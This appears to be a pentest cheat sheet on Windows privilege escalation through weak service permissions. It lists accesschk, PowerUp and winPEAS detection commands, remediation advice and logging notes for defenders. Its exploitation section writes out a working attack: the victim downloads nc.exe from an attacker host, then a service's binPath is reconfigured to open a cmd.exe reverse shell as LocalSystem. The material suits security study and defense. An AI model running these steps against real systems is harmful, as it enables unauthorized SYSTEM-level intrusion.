---
tags: [ exploit, wpe, windows, privesc ]
---
# Weak service permission
# Detection
# List all services on which the "Authenticated Users" group holds write (modify) access
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
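# If the output shows SERVICE_ALL_ACCESS for this group, the service is vulnerable:
# any authenticated, non-admin user can change its configuration. SERVICE_CHANGE_CONFIG
# on its own is enough for the same result, so flag that right as well.
# Remediation: restrict the service DACL (for example with `sc sdset`) so that only
# Administrators and SYSTEM can reconfigure the service.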
# Find all weak folder permissions per drive.
accesschk.exe /accepteula -uwdqs Users c:\
accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\
# Find all weak file permissions per drive.
accesschk.exe /accepteula -uwqs Users c:\*.*
accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.*
# or
powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"
# [*] Checking service permissions...
#
# ServiceName : daclsvc
# Path : "C:\Program Files\DACL Service\daclservice.exe"
# StartName : LocalSystem
# AbuseFunction : Invoke-ServiceAbuse -Name 'daclsvc'
# CanRestart : True
# or
winPEAS.exe
# [+] Interesting Services -non Microsoft-(T1007)
#
# daclsvc(DACL Service)["C:\Program Files\DACL Service\daclservice.exe"] - Manual - Stopped
# YOU CAN MODIFY THIS SERVICE: WriteData/CreateFiles
#
# [+] Modifiable Services(T1007)
# LOOKS LIKE YOU CAN MODIFY SOME SERVICE/s:
# daclsvc: WriteData/CreateFiles
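# Exploitation
# The steps below repoint the service's binPath at a different command; when the service
# starts, that command runs under the service's account (LocalSystem in the example above).
# For defenders: this shows up as an sc.exe "config ... binpath=" command line in
# process-creation logs and as a change to the ImagePath value under
# HKLM\SYSTEM\CurrentControlSet\Services\<SERVICENAME>.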
# Attacker
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>
# Victim
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/nc.exe', '.\nc.exe')
sc config <SERVICENAME> binpath= "<PATH>\nc.exe <IP> <PORT> -e cmd.exe"
sc start <SERVICENAME>
# or
net start <SERVICENAME>